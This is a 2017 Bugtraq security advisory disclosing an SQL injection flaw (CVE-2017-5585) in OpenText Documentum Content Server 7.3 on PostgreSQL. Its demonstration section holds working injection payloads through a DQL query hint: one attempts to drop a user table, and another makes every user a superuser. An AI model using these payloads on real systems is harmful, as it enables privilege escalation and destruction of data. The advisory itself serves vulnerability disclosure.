[<prev] [next>] [day] [month] [year] [list]
Message-ID: <45E91F05-5ECE-4473-BFB9-F9AAD5D82B8F@panfilov.tel>
Date: Thu, 16 Feb 2017 01:18:03 +1100
From: "Andrey B. Panfilov" <andrew@...filov.tel>
To: "'bugtraq@...urityfocus.com'" <bugtraq@...urityfocus.com>
Subject: CVE-2017-5585: SQL injection in OpenText Documentum Content Server
7.3 (PostgreSQL builds only)
CVE Identifier: CVE-2017-5585
Vendor: OpenText
Affected products: OpenText Documentum Content Server 7.3 (PostgreSQL builds only)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
Description:
Previously announced fix for CVE-2014-2520 seems to be incomplete: when PostgreSQL Database is used and return_top_results_row_based config option is set to false, Content Server does not properly restrict DQL hints, which allows remote authenticated users to conduct DQL injection attacks and execute arbitrary DML/DDL statements on the target system via crafted request.
Demonstration:
================================================================8<==============================================================
Connecting to Server using docbase DCTM_PSQL
[DM_SESSION_I_SESSION_START]info: "Session 0102987880002902 started for user dm_bof_registry."
Connected to Documentum Server running Release 7.3.0000.0214 Linux64.Postgres
--
-- Amount of superusers in Documentum repository
--
1> select count(*) from dm_user where user_privileges=16
2> go
count
------------
1
(1 row affected)
--
-- Demonstration or how Content Server translates DQL query to SQL
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
2> go
[DM_QUERY_E_CURSOR_ERROR]error:
"A database error has occurred during the creation of a cursor
(' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it;
Error while executing the query')."
1> exec get_last_sql
2> go
result
-------------------------------------------------------------------------------------------
select all CAST(count(*) as int) from dm_user_sp dm_user order by 1;drop table dm_user_s; 1321 Commit 1321 Commit
(1 row affected)
--
-- Exploitation
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;')
2> go
count
------------
67
(1 row affected)
--
-- Amount of superusers in Documentum repository after exploitation
--
1> select count(*) from dm_user where user_privileges=16
2> go
count
------------
67
(1 row affected)
1>
================================================================>8==============================================================
Disclosure timeline:
2014.02.22: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure
__
Regards,
Andrey B. Panfilov
Powered by blists - more mailing lists